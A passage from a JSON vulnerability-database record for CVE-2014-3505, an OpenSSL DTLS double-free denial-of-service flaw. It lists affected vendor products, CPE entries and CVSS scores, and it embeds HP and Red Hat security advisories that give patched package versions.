"eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.0.9.8" }, { "model": "aura communication manager utility services sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.16.1.0.9.8" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7970072.200.134.32804" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7855072.040.134.32804" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7845072.040.134.32804" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7835072.010.134.32804" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7830072.010.134.32804" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7556061.121.225.06100" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7545061.121.225.06100" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7535061.121.225.06100" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7530061.121.225.06100" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7525061.121.225.06100" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7225072.030.134.32804" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7220072.030.134.32804" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "6655072.060.134.32804" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5875072.060.134.32804" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5855072.060.134.32804" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5845072.060.134.32804" }, { "model": "workcentre", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5755061.132.224.35203" }, { "model": "workcentre", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5745061.132.224.35203" }, { "model": "workcentre", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5740061.132.224.35203" }, { "model": "workcentre", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5735061.132.224.35203" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "3655072.060.134.32804" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "9303072.180.134.32804" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "9302072.180.134.32804" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "9301072.180.134.32804" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "8900072.161.134.32804" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "8700072.161.134.32804" }, { "model": "project openssl 1.0.1i", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0n", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8zb", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tssc", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.16" }, { "model": "snapdrive for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "snapdrive for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "open systems snapvault 3.0.1p6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "oncommand workflow automation", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "oncommand unified manager core package 5.2.1p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "data ontap smi-s agent", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "contact optimization", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.4" }, { "model": "clustered data ontap antivirus connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "campaign", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.4" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-493" }, { "model": "hp-ux b.11.31 (11i", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v3)" }, { "model": "hp-ux b.11.23 (11i", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v2)" }, { "model": "hp-ux b.11.11 (11i", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v1)" } ], "sources": [ { "db": "BID", "id": "69081" }, { "db": "CNNVD", "id": "CNNVD-201408-126" }, { "db": "NVD", "id": "CVE-2014-3505" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8za:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8w:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8v:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8x:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3505" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "and Wan-Teh Chang (Google).,Adam Langley", "sources": [ { "db": "CNNVD", "id": "CNNVD-201408-126" } ], "trust": 0.6 }, "cve": "CVE-2014-3505", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2014-3505", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-3505", "trust": 1.0, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201408-126", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-3505", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3505" }, { "db": "CNNVD", "id": "CNNVD-201408-126" }, { "db": "NVD", "id": "CVE-2014-3505" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Double free vulnerability in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (application crash) via crafted DTLS packets that trigger an error condition. OpenSSL is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to crash the affected application, denying service to legitimate users. \nOpenSSL prior to 0.9.8zb, 1.0.0n, and 1.0.1i are vulnerable. \n - The SSLv3 vulnerability known as \"Padding Oracle on Downgraded Legacy\nEncryption\" also known as \"Poodle\", which could be exploited remotely\nresulting in disclosure of information. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04426586\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04426586\nVersion: 1\n\nHPSBOV03099 rev.1 - HP OpenVMS running OpenSSL, Remote Denial of Service\n(DoS) or Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-09-12\nLast Updated: 2014-09-12\n\nPotential Security Impact: Remote Denial of Service (DoS), disclosure of\ninformation\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP OpenVMS\nrunning OpenSSL. \n\nReferences:\n\nCVE-2014-3505 - Remote Denial of Service (DoS)\nCVE-2014-3506 - Remote Denial of Service (DoS)\nCVE-2014-3507 - Remote Denial of Service (DoS)\nCVE-2014-3508 - Remote Disclosure of Information\nCVE-2014-3510 - Remote Denial of Service (DoS)\n\nSSRT101686\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP SSL Version 1.4-476 and earlier for OpenVMS\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-3505 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3506 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3507 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-3510 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has made the following software update available to resolve the\nvulnerabilities with HP OpenVMS running OpenSSL. \n\n HP SSL Version 1.4-493 for OpenVMS is available from the following\nlocation:\n\n http://h71000.www7.hp.com/openvms/products/ssl/ssl.html\n\nHISTORY\nVersion:1 (rev.1) - 12 September 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security update\nAdvisory ID: RHSA-2014:1052-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-1052.html\nIssue date: 2014-08-13\nCVE Names: CVE-2014-3505 CVE-2014-3506 CVE-2014-3507 \n CVE-2014-3508 CVE-2014-3509 CVE-2014-3510 \n CVE-2014-3511 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary. \n\nA race condition was found in the way OpenSSL handled ServerHello messages\nwith an included Supported EC Point Format extension. A malicious server\ncould possibly use this flaw to cause a multi-threaded TLS/SSL client using\nOpenSSL to write into freed memory, causing the client to crash or execute\narbitrary code. (CVE-2014-3509)\n\nIt was discovered that the OBJ_obj2txt() function could fail to properly\nNUL-terminate its output. This could possibly cause an application using\nOpenSSL functions to format fields of X.509 certificates to disclose\nportions of its memory. (CVE-2014-3508)\n\nA flaw was found in the way OpenSSL handled fragmented handshake packets. \nA man-in-the-middle attacker could use this flaw to force a TLS/SSL server\nusing OpenSSL to use TLS 1.0, even if both the client and the server\nsupported newer protocol versions. (CVE-2014-3511)\n\nMultiple flaws were discovered in the way OpenSSL handled DTLS packets. \nA remote attacker could use these flaws to cause a DTLS server or client\nusing OpenSSL to crash or use excessive amounts of memory. (CVE-2014-3505,\nCVE-2014-3506, CVE-2014-3507)\n\nA NULL pointer dereference flaw was found in the way OpenSSL performed a\nhandshake when using the anonymous Diffie-Hellman (DH) key exchange. A\nmalicious server could cause a DTLS client using OpenSSL to crash if that\nclient had anonymous DH cipher suites enabled. (CVE-2014-3510)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1127490 - CVE-2014-3508 openssl: information leak in pretty printing functions\n1127498 - CVE-2014-3509 openssl: race condition in ssl_parse_serverhello_tlsext\n1127499 - CVE-2014-3505 openssl: DTLS packet processing double free\n1127500 - CVE-2014-3506 openssl: DTLS memory exhaustion\n1127502 - CVE-2014-3507 openssl: DTLS memory leak from zero-length fragments\n1127503 - CVE-2014-3510 openssl: DTLS anonymous (EC)DH denial of service\n1127504 - CVE-2014-3511 openssl: TLS protocol downgrade attack\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 